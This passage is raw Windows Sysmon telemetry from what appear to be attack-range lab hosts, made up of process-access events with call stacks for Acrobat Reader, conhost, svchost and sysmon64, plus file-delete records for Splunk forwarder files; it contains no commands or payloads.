DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.152{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.152{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.105{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.105{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.058{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.058{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.011{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:28.011{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.901{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=3EC5E40A22C808BFFD775E0E112E804D,SHA256=B63B5EEFF66A4177B877C1D0BACD32711607F622D3493897CE0DF0BA5952C1EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.901{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAF7E1F034091A10A3A894FC4A91BCB1,SHA256=8F6CF0D47FF8CB7529F540567325BF2CD3E48A229748BDAAD6CF50F3DAB45DBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.869{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57F7106FDE9E03CD9652298AC880DB61,SHA256=DCCE71A5DD4FB1FFB9F17FF6053EDDC56200FBCBE7EC41BC6FA67B2C4B0B9AB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.838{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E665-63C7-9406-00000000AF02}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018813Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E665-63C7-3D02-00000000B002}3592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018812Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018811Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018810Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018809Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018808Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018807Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018806Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018805Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018804Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:29.847{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E665-63C7-3D02-00000000B002}3592C:\Program 